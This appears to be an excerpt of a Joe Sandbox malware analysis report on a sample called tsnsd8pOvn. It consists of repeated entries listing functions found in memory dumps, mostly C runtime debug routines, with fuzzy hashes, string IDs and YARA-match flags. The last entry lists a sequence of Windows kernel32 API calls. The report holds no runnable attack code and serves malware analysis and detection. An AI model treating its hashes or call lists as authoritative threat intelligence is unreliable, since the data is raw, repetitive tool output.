                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter_memset
                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                                • API String ID: 3961059608-322421350
                                • Opcode ID: a4fed7f64de0e10a9a36a2912373e52f724543dc9c4375cdafcd83e056f2b0a9
                                • Instruction ID: b603e27b430cf78f79cb029d5d20f991a93154f59d932ddaecc50e6203803a39
                                • Opcode Fuzzy Hash: a4fed7f64de0e10a9a36a2912373e52f724543dc9c4375cdafcd83e056f2b0a9
                                • Instruction Fuzzy Hash: 7121C470A01349DBDF24DF54DC45BEE73A0BB44319F20426BE828263C0D7B999A1CB6A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter_memset
                                • String ID: (_HEAP_MAXREQ / nNum) >= nSize$_calloc_dbg_impl$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 3961059608-1805389939
                                • Opcode ID: a98847472c101b993253f90d20c06eb9093f38dbc27449be3c0f5c7a6e23c151
                                • Instruction ID: 85d65669da18c2917e6e3e9b40ba5ef8a5098ba399283d423beb3edc5baabddd
                                • Opcode Fuzzy Hash: a98847472c101b993253f90d20c06eb9093f38dbc27449be3c0f5c7a6e23c151
                                • Instruction Fuzzy Hash: DA119BB1B40104BBDB10DF95ED46F5F37A4AB94714F10856AFA08BB2C2D6B8D9108B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: D
                                • API String ID: 2102423945-2746444292
                                • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction ID: 9e43dfd2e10ff055f32f772e6374569b431b6508736e147b85de5b9c72ffcc43
                                • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                • Instruction Fuzzy Hash: 48E15D71D1022AEACF24DFE0CD49FEEB7B8BF04304F144169E909A6194EB769A49CF54
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: $$$(
                                • API String ID: 2102423945-3551151888
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 18e12efcc15b8212b7334cdf990d6b62abef512b5a68538151ee3a69cc9298c2
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: 4191AC71D10219EAEF21CFE0C849BEEBBF5AF15304F144169D406B7284DBB65A48CFA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction ID: 9177e0fe409aab1d78ff5bb01105178d717b7215dc15eb9d0700ac50e472d47c
                                • Opcode Fuzzy Hash: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction Fuzzy Hash: 9341F8B1E5012ADFDB24CF48C841BAEB7B5BF85314F1040AAE148B7282D7785E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction ID: f4e2372d1ef2cc0e6896abbae7fcf29c10d11fa0f0b1cde215167b7ef8af7524
                                • Opcode Fuzzy Hash: 561fe5e1ff640314796f634126af73b80010c38c858009088e47a62c609df131
                                • Instruction Fuzzy Hash: 2841E6B1A102299FDB24CF58C841B9FB7B5FF85314F1040A99258BB281D7785E85CF9A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: 246765e91aea20986e4a9df16f65070b244bee9e6e1a545cb208d8e74e9bcf73
                                • Instruction ID: cd0af96aba5d2941fb41913c64e0471a9dc0971cc032b4ede55a07fa3a4f1429
                                • Opcode Fuzzy Hash: 246765e91aea20986e4a9df16f65070b244bee9e6e1a545cb208d8e74e9bcf73
                                • Instruction Fuzzy Hash: 7841D4B1D19229DFEB24CF59CC89BEEB7B5BB84304F10859AE049A7240D7389E85CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction ID: 46614499eb2dd8ef096e281f2e7dc0df823b3af95b098c6a1be0907913641e05
                                • Opcode Fuzzy Hash: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction Fuzzy Hash: 4141EAB1E5012ADFDB24CF48C981B9EB7B5FF85314F1041AAE148A7282C7385E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __aulldiv__aullrem_get_int64_arg
                                • String ID: 9
                                • API String ID: 3120068967-2366072709
                                • Opcode ID: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction ID: ddabfec3a7046ed8c65c3bd1ecccacda018f4a6832024a0e2bf443473914f47f
                                • Opcode Fuzzy Hash: f2b4ca237a238aae3c26a87df61934f62392bb24527560412936e188f498dd5d
                                • Instruction Fuzzy Hash: CD41E5B1A102299FDB24CF58C881BAFB7B5FB85314F1081A9D258B7281D7385E85CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction ID: 84a59e8b8dfbf795f142f8643cff091771d4c4e11fb83c0281cafb02352f1a82
                                • Opcode Fuzzy Hash: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction Fuzzy Hash: 9C41E8B1E5012ADFDB24CF58C981BDEB7B5BF85314F1041AAE248A7282C7385E81CF59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction ID: e3b60444fb68a155374124565f1552c669e3def674ae0a491053beb8008b26d0
                                • Opcode Fuzzy Hash: 5f9e40789b7f7708f9b285234ed8a6e8849f0e33ec4d5cbd22c2f7085c305ed1
                                • Instruction Fuzzy Hash: EF41E6B1A102299FDB24CF58C981B9FB7B5FB85314F1041AAA258B7281D7385E81CF5E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg$__aulldiv__aullrem
                                • String ID: 9
                                • API String ID: 2124759748-2366072709
                                • Opcode ID: 8dd5430ec6d529783fa8057ea78a9825fddb7b68d4cf03b946cfbfa0456bc17b
                                • Instruction ID: 2fb8b85ceefbb1adc23e365f0c49b7bbe8d68d6f2320797511d85c2a919ea4e5
                                • Opcode Fuzzy Hash: 8dd5430ec6d529783fa8057ea78a9825fddb7b68d4cf03b946cfbfa0456bc17b
                                • Instruction Fuzzy Hash: 2541D5B1D19229DFEB24CF58C889BEEB7B5BB44304F10859AE049A7240D7389EC5CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction ID: 2de81546a9a08d9f1e3bd47ff866361e2df67fd940e29239687069930e2b62b3
                                • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                • Instruction Fuzzy Hash: CB215BB263430D7AEB019AE49C45BBE73ADDB49350F900165F90CCA198FF71EA508AA4
                                APIs
                                Strings
                                • pHead->nBlockUse == nBlockUse, xrefs: 004036CB
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 004036D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __free_base_memset
                                • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c$pHead->nBlockUse == nBlockUse
                                • API String ID: 2669475236-3676899318
                                • Opcode ID: 2fe85c2b0d0e1c064366268f3053e93a23d3b5552b4b10654f6680eeaaabf071
                                • Instruction ID: 5616b5ce360a9c6ef88d89632992d078fda9e73a76ea70273ceddcd21d78e2d5
                                • Opcode Fuzzy Hash: 2fe85c2b0d0e1c064366268f3053e93a23d3b5552b4b10654f6680eeaaabf071
                                • Instruction Fuzzy Hash: 7B2124B8A00104EFC714CF55D681A6A77B6BB85309F34C5A9D4052B395C779EF02DF89
                                APIs
                                Strings
                                • _pLastBlock == pHead, xrefs: 0040372E
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040373A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __free_base_memset
                                • String ID: _pLastBlock == pHead$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 2669475236-449961717
                                • Opcode ID: dbef88f62b027a873f7529350cab3b92387cfec11708301133335f582734b04c
                                • Instruction ID: 658fa22ba22eace41271ecb2dbfe4b3bb5af4cff2e4683ec24a46d5b320643a7
                                • Opcode Fuzzy Hash: dbef88f62b027a873f7529350cab3b92387cfec11708301133335f582734b04c
                                • Instruction Fuzzy Hash: 8C0184F8A00104EBC704CB55D981E5AB7B9BB85709F3086A9E50567392D235EF02DB89
                                APIs
                                • __invalid_parameter.LIBCMTD ref: 00419ED7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter
                                • String ID: _wcstombs_l_helper$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$pwcs != NULL
                                • API String ID: 3730194576-2632876063
                                • Opcode ID: 0dc89c6f5ec4772fa89874f9ef2e2cc502443b01295abe8e99ab1f4456162202
                                • Instruction ID: a0282508e20a1d91789113daefc18912f89b6930a82126994f97794c5e94db61
                                • Opcode Fuzzy Hash: 0dc89c6f5ec4772fa89874f9ef2e2cc502443b01295abe8e99ab1f4456162202
                                • Instruction Fuzzy Hash: F3F0C870F80328AAEB20BE61FD07B9B31506750714F12056BF906251C2D3FE49D0856D
                                APIs
                                • __invalid_parameter.LIBCMTD ref: 0041A3CB
                                Strings
                                • _wcstombs_s_l, xrefs: 0041A3C1
                                • (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0), xrefs: 0041A383, 0041A3C6
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0041A38F, 0041A3BC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __invalid_parameter
                                • String ID: (dst != NULL && sizeInBytes > 0) || (dst == NULL && sizeInBytes == 0)$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c
                                • API String ID: 3730194576-625432840
                                • Opcode ID: 06c57a437acdbe8268f786f5554a6d1182b17f726ad288dcbbf4ec8d850351a7
                                • Instruction ID: 6fcc669b4b5cd66ad1181ab845c00de6b54bb55e8edcb972f8a1cf158ff4aa31
                                • Opcode Fuzzy Hash: 06c57a437acdbe8268f786f5554a6d1182b17f726ad288dcbbf4ec8d850351a7
                                • Instruction Fuzzy Hash: CE016270A4131CEAEB206E80EC067EFB260AB10719F51451BE924252C1D3FD46D4CA9E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: 4548f819cf05fa721a7f8beb3c83d8e4fd1b77eead0652ad120ed9afd1acc253
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: A8F0ED78698754A5F7227B90BC26B857E917B31B09F104088E1182E2E5D3FD238CA79A
                                APIs
                                • ExitProcess.KERNEL32 ref: 0041F66C
                                • GetLastError.KERNEL32 ref: 0041F672
                                • SetLastError.KERNEL32(00000000), ref: 0041F67A
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0041F687
                                • GetProcAddress.KERNEL32(?,LocalAlloc), ref: 0041F69D
                                • WriteConsoleA.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041F6EF
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F6F9
                                • SetFileApisToANSI.KERNEL32 ref: 0041F731
                                • OpenSemaphoreW.KERNEL32(00000000,00000000,00000000), ref: 0041F761
                                • SetSystemTime.KERNEL32(?), ref: 0041F792
                                • GetPrivateProfileIntA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F7DA
                                • GetSystemDefaultLangID.KERNEL32 ref: 0041F7E0
                                • GetUserDefaultLCID.KERNEL32 ref: 0041F7E6
                                • SetVolumeLabelW.KERNEL32(00000000,00000000), ref: 0041F7F0
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F7FE
                                • OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 0041F84B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: DefaultErrorLastOpenProcessSystem$AddressApisBoostConsoleExitFileHandleLabelLangModuleMultipleMutexObjectsPriorityPrivateProcProfileSemaphoreTimeUserVolumeWaitWrite
                                • String ID: l
                                • API String ID: 653065421-2517025534
